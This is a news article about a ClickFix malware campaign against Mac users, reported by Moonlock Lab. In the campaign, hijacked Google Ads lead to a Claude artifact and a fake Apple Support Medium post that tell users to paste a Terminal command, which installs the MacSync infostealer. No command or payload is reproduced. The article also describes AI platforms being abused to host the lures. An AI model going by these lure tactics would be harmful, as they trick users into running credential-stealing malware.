Cyber security researchers at Moonlock Lab, the investigative unit of the popular software developer MacPaw, have uncovered a clever new way that hackers are targeting Mac users. This campaign uses the ClickFix technique, where people are tricked into copying and pasting dangerous commands directly into their computer’s Terminal and the attack starts with a simple Google search.
How the Trap is Set
The hackers managed to hijack legitimate, verified Google Ads accounts belonging to Earth Rangers, a Canadian children’s charity, and a Colombian watch retailer called T S Q SA. Because these accounts have an established history and a good reputation, their malicious adverts bypassed Google’s security checks without any verification alarms.
When users search for common technical terms like “online DNS resolver,” “HomeBrew,” or “macos cli disk space analyzer,” they are shown a “sponsored” link at the top of the results. As the team at Moonlock Lab recently shared in a series of posts on X (formerly Twitter): “What if a Google Sponsored result for a common macOS query led to malware? That’s happening right now.”
🧵 1/ 🚨 What if a Google Sponsored result for a common macOS query led to malware? That's happening right now and 15K+ people have already seen it.
We at @MoonlockLab observed 2 variants today abusing legitimate platforms for ClickFix delivery: a @AnthropicAI public artifact on… pic.twitter.com/e1ocnQPmV4— Moonlock Lab (@moonlock_lab) February 11, 2026
These results lead to one of two traps:
- A Claude AI Artifact: A public page on the official Claude AI website titled “macOS Secure Command Execution.” Moonlock researchers warned that this fake guide had already been viewed over 15,600 times.
- A Medium Article: A post hosted at apple-mac-disk-space.mediumcom, which is designed to impersonate the official Apple Support Team.
The ClickFix Trick
As is generally observed, most people trust information found on official-looking platforms. These pages provide a specific line of code and instruct the user to paste it into their Terminal to fix a problem or install a tool. Once a user runs this command, it secretly downloads the MacSync infostealer.
While all infostealers are designed to quietly hunt for private data, MacSync is particularly thorough. It targets your Keychain (where macOS stores system passwords), browser-saved logins, and private keys from cryptocurrency wallets. The stolen data is then bundled into a file named osalogging.zip and sent straight to the hackers’ server.
This isn’t the first time AI tools have been used this way; similar tricks were recently spotted using ChatGPT and Grok to spread malware.
Staying Safe
Researchers at Moonlock Lab believe the same group is behind both variants of the attack. Specifically, the malicious commands in both the Claude and Medium guides connect to the same Command-and-Control (C2) server to download the final payload. It is worth noting that MacSync is actually a more advanced rebrand of an older malware called Mac.c, proving that these hackers are constantly refining their tools.
To stay safe, never paste a command into your Terminal if you do not fully understand what it does. It is always safer to download software directly from official websites rather than following links found in sponsored search results.
Deeba Ahmed
